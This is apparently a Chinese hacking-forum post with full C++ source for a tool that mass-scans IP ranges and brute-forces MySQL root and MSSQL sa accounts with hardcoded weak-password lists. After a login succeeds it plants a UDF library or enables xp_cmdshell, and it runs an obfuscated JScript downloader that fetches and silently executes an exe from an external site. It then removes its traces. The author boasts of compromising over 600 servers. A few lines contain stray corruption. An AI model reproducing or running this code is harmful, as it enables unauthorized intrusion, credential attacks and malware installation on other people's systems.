本工具可以同时进行进行mysql和mssql的弱口令扫描,并上传文件执行.
扫描成功获得弱口令账号密码后会自动根据版本信息保存扫描日志
mysql:
     成功得到root密码后,新建表插入udf.dll二进制数据,并创建函数执行.
     操作完成后,会删除使用的表和创建的函数
     自动获取并根据mysql版本进行操作,mysql>5.1的自动获得plugin目录进行导出操作
     不提供udf的源码(挺简单)
mssql:
    成功得到sa密码后,尝试开启xp_cmdshell,执行命令
    命令为jscript脚本.(比FTP方便)
    操作执行完成后禁用xp_cmdshell
    (没怎么用,所以功能简单)

每次猜解密码时会自动ping主机,如果大于设定超时时间跳过
端口扫描使用s扫描器
扫描通过读取程序目录的res.txt文件得到扫描的ip段
格式为
      mysql和mssql一起扫:1 192.168.0.1 192.168.0.254[3306,1433] 
      单独扫一个:1 192.168.0.1 192.168.0.254[3306]
默认端口扫描线程为512 ,详见源码
默认并发密码猜解线程为100 (中间有Sleep 为低配置的机器考虑,详见源码)
mysql SDK 自行到mysql.com或者baidu,google下载
此代码在vs2008中编译成功,无任何错误.
由于配置错误或者编译器等等问题,本人一概不解释.

本人已利用此工具,得到600多台服务器,由于觉得无大用,所以早早停止了使用.
此代码写了很有些时日了,为vc初学者的练手题,所以代码中的错误,逻辑问题 牛哥们请自行修改

#include <Windows.h>
#include <iostream>
#include <fstream>
#include <time.h>
#include <string>
#include <sql.h>
#include <sqlext.h>
#include "I:\\vs\\mysqlApi\\include\\mysql.h"

/*Code by s!lly3r  Mail:silly3r@gmail.com*/
#pragma comment(lib,"I:\\vs\\mysqlApi\\lib\\libmysql.lib")
#pragma comment(lib,"Ws2_32.lib")
using namespace std;

 


#define XMYSQL 1
#define XMSSQL 2

#define MY_MSG WM_USER+100
#define EX_MSG WM_USER+101
BOOL IsPortOpen(char * address, int port);
DWORD WINAPI Thread1(LPVOID lpParameter);
DWORD WINAPI check(LPVOID lpParameter);
DWORD WINAPI Timer(LPVOID lpParameter);

struct data
{
        char ip[16];
        int type;
        //HANDLE nhth;
};

//int state=0;
int ThreadMax=512;
int CrackMax=100;
char s_type[]="syn";
bool state=false;
long respos=0;
DWORD dw_ThreadId=NULL;
DWORD dw2_ThreadId=NULL;
int nMAX=0;
int nFlag=0;
bool Timeout=false;

bool scanner();
char *mypass[]={
        "root",
        "mysql",
        "123456",
        "pass",
        "password",
        "abc123",
        "iloveyou",
        "12345",
        "1234",
        "123",
        "admin",
        "12",
        "1",
        "11",
        "111",
        "1111",
        "11111",
        "111111",
        ""
};
char *mspass[]={
        "",
        "sa",
        "pass",
        "password",
        "abc123",
        "iloveyou",
        "admin",
        "1",
        "12",
        "123",
        "1234",
        "12345",
        "123456",
        "root",
        "11",
        "111",
        "1111",
        "11111",
        "111111"
};

int _tmain()
{
        FILE *f;
        char buff[50];
        srand((unsigned)time(NULL));
        nFlag=GetTickCount()+rand()%999;
        CreateThread(NULL,NULL,check,NULL,NULL,&dw_ThreadId);
        int i=0;
        while(true)
        {
                if(!scanner()){
                        printf("rror\n");
                        Sleep(1000);
                        return 0;
                }
                Sleep(1000);

                if(fopen_s(&f,"Result.txt","r"))
                {
                        printf("Error%d\n",GetLastError());
                        return 0;
                }       
               
                while(true)
                {
                        if(fgets(buff,50,f)==NULL)break;
                        if(strlen(buff)!=41)continue;
                        if(i<=CrackMax){
                                if(buff[1]==0x2E || buff[2]==0x2E || buff[3]==0x2E) /*0x2E '.'*/
                                {
                                        char *ip=new char[16];
                                        data *pdata=new data;
                                        char *temp=new char[4];
                                        memset(ip,0,sizeof(ip));
                                        for(int j=0;j<=15;j++)
                                        {
                                                if(buff[j]==0x20)
                                                {
                                                        ip[j]=0;
                                                        j=17;
                                                        for(int t=0;j<=21;j++)
                                                        {
                                                                if(buff[j]==0x20)break;
                                                                temp[t]=buff[j];
                                                                t++;
                                                        }
                                                        break;
                                                }
                                                ip[j]=buff[j];
                                        }
                                        memset(pdata->ip,0,sizeof(pdata->ip));
                                        strcpy_s(pdata->ip,sizeof(pdata->ip),ip);
                                        if(atoi(temp)==1433)
                                        {
                                                pdata->type=XMSSQL;
                                        }else if(atoi(temp)==3306)
                                        {
                                                pdata->type=XMYSQL;
                                        }else{
                                                printf("result.txt error");
                                                continue;
                                        }
                                        state=false;
                                        CreateThread(NULL,NULL,&Thread1,(LPVOID)pdata,0,0);
                                        i++;
                                        Sleep(100);                                       
                                        while(true){
                                                if(state)
                                                {
                                                        delete[] pdata;
                                                        pdata=NULL;
                                                        delete[] ip;
                                                        ip=NULL;
                                                        delete[] temp;
                                                        temp=NULL;
                                                        break;
                                                }
                                                Sleep(1);
                                        }                                       
                                }else{
                                        continue;
                                }
                        }else{               
                                Sleep(2000);
                                Timeout=false;
                                CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
                                while(true){
                                        if(nMAX>=0.8*i || Timeout){                                               
                                                nFlag=GetTickCount()+rand()%999;
                                                nMAX=0;
                                                printf(".W");
                                                PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
                                                break;
                                        }
                                        Sleep(10);
                                }
                                i=0;                               
                        }                       
                }
                if(i>0)
                {
                        Sleep(2000);                       
                        Timeout=false;
                        CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
                        while(true){
                                if(nMAX>=0.8*i || Timeout){                                               
                                        nFlag=GetTickCount()+rand()%999;
                                        nMAX=0;
                                        printf(".W");
                                        PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
                                        break;
                                }
                                Sleep(10);
                        }       
                }

                fclose(f);
                Sleep(2000);
               
        }       
        Sleep(1000);
        return 0;
}

DWORD WINAPI Thread1(LPVOID lpParameter)
{

//        state=1;
        char *host=new char[16];
        int type;
//        HANDLE handle;
        memset(host,0,sizeof(host));


        type=((data*)lpParameter)->type;
        strcpy_s(host,16,((data*)lpParameter)->ip);
        state=true;

        DWORD nTflag=nFlag;
        if(type==XMYSQL)
        {
               
                if(!IsPortOpen(host,3306))
                {
                        printf(".X");
                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                        return 0;
                }
                       
                printf(".M");
                MYSQL *sock;
                sock=mysql_init(0);
                if(!sock)
                {
                        printf("Mysql sock Init Error %s",mysql_error(sock));
                }               
                for(int i=0;i<sizeof(mypass)/sizeof(char*);i++){
                       
                        if(mysql_real_connect(sock,host,"root",mypass[i],"mysql",3306,NULL,NULL))
                        {
                                string ver=mysql_get_server_info(sock);
                                printf(".-m-");
                                if((static_cast<int>(ver.c_str()[0]) == 53 && static_cast<int>(ver.c_str()[2]) >= 49) ||
                                        static_cast<int>(ver.c_str()[0]) > 53 )
                                {
                                        MYSQL_RES *res;
                                        MYSQL_ROW row=NULL;
                                        char dir[MAX_PATH]={0};
                                        char _dir[MAX_PATH]={0};
                                        char Tmp[MAX_PATH]={0};
                                        mysql_query(sock,"show variables like '%plugin%'");
                                        res=mysql_use_result(sock);
                                        if(mysql_num_fields(res)>=2)
                                        {
                                                row=mysql_fetch_row(res);
                                                strcpy_s(Tmp,MAX_PATH,row[1]);
                                                if(row[1][0]=='/')
                                                {
                                                        mysql_close(sock);
                                                        delete host;
                                                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                                                        return 0;
                                                }
                                                int num=0;
                                                for(int ii=0;ii<=lstrlen(row[1]);ii++)
                                                {
                                                        if(Tmp[ii]!='\\' && Tmp[ii]!='/')
                                                                dir[num]=row[1][ii];
                                                        else if(Tmp[ii]=='/'){
                                                                dir[num]='\\';
                                                                dir[num+1]='\\';
                                                                num+=2;
                                                                continue;
                                                        }else{
                                                                dir[num]='\\';
                                                                dir[num+1]='\\';
                                                                num++;
                                                        }                                               
                                                        num++;
                                                }
                                        }else{
                                                strcpy_s(dir,MAX_PATH,"c:\\\\windows");
                                        }
                                       
                                        mysql_free_result(res);
                                               
        &nbs, p;                               mysql_query(sock,"DROP TABLE `silly3r_x`");
                                        mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
                                        mysql_query(sock,"INSERT INTO `silly3r_x` VALUES (...)");
                                        //此处为插入udf二进制的语句,建议新建一个h文件,把udf二进制数据定义为一个变量放进去
                                        //udf换到vc6下编辑, 只是下载执行功能 ,体积可以控制在5k以内的
                                        Sleep(500);
                                       
                                        sprintf_s(_dir,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE '%s\\\\silly3r_x.so' FROM silly3r_x",dir);
                                        mysql_query(sock,_dir);
                                        Sleep(500);
                                        mysql_query(sock,"CREATE FUNCTION silly3r_x RETURNS STRING SONAME 'silly3r_x.so'");
                                        mysql_query(sock,"DROP TABLE `silly3r_x`");
                                        ofstream mylog;
                                        mylog.open("Mysql_5.1.txt",ios::app|ios::out|ios::_Noreplace);
                                        mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version>5.0"<<endl;
                                        mylog.close();                                       
                                }else if((static_cast<int>(ver.c_str()[0]) <=53) && (ver.find("nt")<ver.length() || ver.find("NT")<ver.length()))
                                {
                                        //mysql_query(sock,"use mysql");
                                        mysql_query(sock,"DROP FUNCTION udown");
                                        mysql_query(sock,"DROP TABLE `silly3r_x`");
                               
                                        mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
                                        mysql_query(sock,udf);
                                        Sleep(500);
                                        mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\windows\\\\silly3r_x.so' FROM silly3r_x");
                                        Sleep(500);
                                        mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\winnt\\\\silly3r_x.so' FROM silly3r_x");
                                        Sleep(500);
                                        mysql_query(sock,"CREATE FUNCTION silly3r RETURNS STRING SONAME 'silly3r_x.so';");
                                        mysql_query(sock,"SELECT udown(\"http://www.T00ls.net/s!illy3r.exe\")");
                                        Sleep(500);
                                        mysql_query(sock,"DROP TABLE `silly3r_x`");
                                        mysql_query(sock,"DROP FUNCTION udown");
                                        ofstream mylog;
                                        mylog.open("Mysql_5.0.txt",ios::app|ios::out|ios::_Noreplace);
                                        mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
                                        mylog.close();
                                       
                                }else{
                                        ofstream mylog;
                                        mylog.open("Mysql_UNIX.txt",ios::app|ios::out|ios::_Noreplace);
                                        mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
                                        mylog.close();
                                }
                                mysql_close(sock);
                                delete host;
                                PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                                return 1;
                        }else{

                                if(mysql_errno(sock)==1045)
                                {
                                        //printf(".m");
                                        //PostThreadMessage(nThreadId,MY_MSG,0,0);
                                }else{
                                        //PostThreadMessage(nThreadId,MY_MSG,0,0);
                                       
                                        mysql_close(sock);                       
                                        //CloseHandle(thandle);
                                        delete host;
                                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                                        return 1;
                                }
                        }
                }

                mysql_close(sock);
                delete host;
                PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                //CloseHandle(thandle);
                return 1;

        }else if(type==XMSSQL)
        {
                       
                if(!IsPortOpen(host,1433))
                {
                        printf(".X");
                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                        return 0;
                }
                printf(".S");
                SQLUINTEGER nTimeout=4;

                SQLHANDLE henv,chandle,query; //SQL环境句柄
                char szBuffer[128]= {0};
                SWORD swStrLen;
                SQLRETURN ret;


                if(SQLAllocHandle(SQL_HANDLE_ENV,NULL,&henv)!=SQL_SUCCESS)
                {
                        printf("SQLAllocHandle error");
                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                        return 0;
                }
                if(SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER)!=SQL_SUCCESS)
                {
                        printf("SQLSetEnvAttr error");
                        SQLFreeHandle(SQL_HANDLE_ENV,henv);
                        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                        return 0;
                }
                SQLAllocHandle(SQL_HANDLE_DBC,henv,&chandle);
                //SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                SQLGetConnectAttr(chandle, SQL_ATTR_CONNECTION_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);
                SQLGetConnectAttr(chandle, SQL_ATTR_LOGIN_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);

 


                for(int i=0; i<sizeof(mspass)/sizeof(char*);i++)
                {
                        string str1="DRIVER={SQL Server};SERVER=";
                        str1+=host;
                        str1+=",1433;UID=sa;PWD=";
                        str1+=mspass[i];
                        str1+=";DATABASE=master";
                        printf(".s");

                        ret=SQLDriverConnect(chandle,NULL,(SQLCHAR *)str1.c_str(),str1.length(),
                                (SQLCHAR *)szBuffer,sizeof(szBuffer),&swStrLen,        SQL_DRIVER_COMPLETE_REQUIRED);
                        if(ret==SQL_SUCCESS || ret==SQL_SUCCESS_WITH_INFO)
                        {
                                printf(".-s-");
                                ofstream mslog;
                                mslog.open("mssql.txt",ios::app|ios::out|ios::_Noreplace);
                                mslog<<host<<"|"<<mspass[i]<<endl;
                                mslog.close();
                               
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'echo var u=\"http://www.T00ls.net/s!illy3r.exe\";try{var xav=\"DB.S\";var xav1=\"ipt.S\"+\"h\";var xml=new ActiveXObject(\"Microsoft.XMLHTTP\");xml.open(\"Get\",u,false);xml.send();var as=new ActiveXObject(\"A\"+/*123*/\"D\"+\"O\"+xav+\"tre\"+\"am\");as.Type=1;as.Open();as.write(xml.responseBody);as.SaveToFile(\"temp.exe\",2);as.Close();var w=new ActiveXObject(\"Ws\"+/*555*/\"c\"+\"r\"+xav1+\"ell\");w.run(\"temp.exe\",0);}catch(e){}>>cc.js'",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'wscript.exe cc.js'",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
                                SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;",SQL_NTS);
                                SQLFreeHandle(SQL_HANDLE_STMT,query);
                                SQLDisconnect(chandle);
                               
                                //delete[] &szBuffer;
                                SQLFreeHandle(SQL_HANDLE_ENV,henv);
                                SQLFreeHandle(SQL_HANDLE_DBC,chandle);
                                delete host;
                                PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                                return 0;

                        }
                }
                SQLDisconnect(chandle);
               
                //delete[] &szBuffer;
                SQLFreeHandle(SQL_HANDLE_ENV,henv);
                SQLFreeHandle(SQL_HANDLE_DBC,chandle);
                delete host;
                PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
                return 1;
        }else{
                ///....................
        }

        PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
        return 1;
}
bool scanner()
{
        DeleteFile("Result.txt");
        FILE *res;
        char buffer[60];
        if(fopen_s(&res,"res.txt","r"))
        {
                printf("res.txt open error %d\n",GetLastError());
                return 0;
        }

        fseek(res,respos,SEEK_SET);
        if(fgets(buffer,60,res)==NULL)
        {
                printf("fgets res.txt error\n");
                Sleep(3000);
                return 0;
        }
        respos=ftell(res);


        if(strlen(buffer)<25 || buffer[strlen(buffer)-2]!=0x5D)
        {
                if(buffer[strlen(buffer)-1]!=0x5D){
                        printf("res.txt error\n");
                        Sleep(3000);
                        return 0;
                }
        }
        fclose(res);
        char num[63]={0};

        for(int i=0;i<=63;i++)
        {
                if(buffer[i]!=0x5B && buffer[i]!=0x5D)
                {
                        num[i]=buffer[i];
                }else if(buffer[i]==0x5B)
                {
                        num[i]=0x20;
                }else if(buffer[i]==0x5D)
                {
                        num[i+1]=0x00;
                        //if(buffer[i+1]==0x5B)
                        //{
                        //        num[i]=0x2C;
                        //        //break;
                        //}else{
                        //        break;
                        //}
                       
                }
        }

        STARTUPINFO si;
        memset(&si,0x0,sizeof(si));
        si.cb=sizeof(STARTUPINFO);
        si.dwFlags=STARTF_USESHOWWINDOW;
        si.wShowWindow=SW_SHOW;
        PROCESS_INFORMATION pi;
        char *cmd=new char[80];
        sprintf_s(cmd,80,"s.exe %s %s %d /save",s_type,num,ThreadMax);
        printf("%s\n",cmd);
        if(!CreateProcess(NULL,cmd,NULL,NULL,0,NULL,NULL,NULL,&si,&pi))
        {
                printf("s.exe start error...%d",GetLastError());
                return 0;
        }
        WaitForSingleObject(pi.hProcess,INFINITE);
        delete[] cmd;
        cmd=NULL;


        return true;
}

DWORD WINAPI check(LPVOID lpParameter)
{
       
       
        MSG msg;
        PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);


        //SetTimer(0,0,60000,NULL);

        while(true)
        {
                if(GetMessage(&msg,0,0,0))
                {
                        switch(msg.message)
                        {
                        case MY_MSG:
                                if(msg.wParam==nFlag)nMAX++;                               
                                break;
                        case EX_MSG:
                                //
                                break;
                        }
                }


        }
        return 0;
}
DWORD WINAPI Timer(LPVOID lpParameter)
{
       
       
        MSG msg;
        PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);


        SetTimer(0,0,40000,NULL);

        while(true)
        {
                if(GetMessage(&msg,0,0,0))
                {
                        switch(msg.message)
                        {
                        case WM_TIMER:
                                Timeout=true;
                                return 0;
                                break;
                        case EX_MSG:
                                Timeout=false;
                                return 0;
                                break;
                        }
                }


        }
        return 0;
}
BOOL IsPortOpen(char * address, int port)
{
        int recv = 1;
        WSADATA wsadata;
        int fd;
        struct sockaddr_in clientaddress;
        struct hostent * host1;
        BOOL Result = FALSE;
        struct timeval timer4;
        fd_set writefd;
        ULONG value = 1;

        recv = WSAStartup(MAKEWORD(1,1), &wsadata);

        if(recv != 0)
        {
                printf("init failed %d.\n",WSAGetLastError());
                return 0;
        }

        if ( LOBYTE( wsadata.wVersion ) != 1 ||
                HIBYTE( wsadata.wVersion ) != 1 ) {

                        WSACleanup();
                        return 0;
        }

        fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        if(fd < 0)
        {

                printf("[-] Create socket error %d. \n",WSAGetLastError());
                return(0);
        }

        ioctlsocket(fd,FIONBIO,&value);

        if (!(host1 = gethostbyname(address))){
                printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
                return 0;
        }

        memset(&clientaddress, 0, sizeof(struct sockaddr));
        clientaddress.sin_family =AF_INET;
        clientaddress.sin_port = htons((unsigned short)port);
        clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);

        timer4.tv_sec = 4;
        timer4.tv_usec = 0;

        FD_ZERO(&writefd);
        FD_SET(fd,&writefd);

        recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));

        if( FD_ISSET(fd, &writefd))
        {
          ,       recv = select(fd+1, NULL, &writefd, NULL, &timer4);

                if( recv > 0 )
                        Result = TRUE;
        }

        closesocket(fd);
        WSACleanup();

        return Result;

}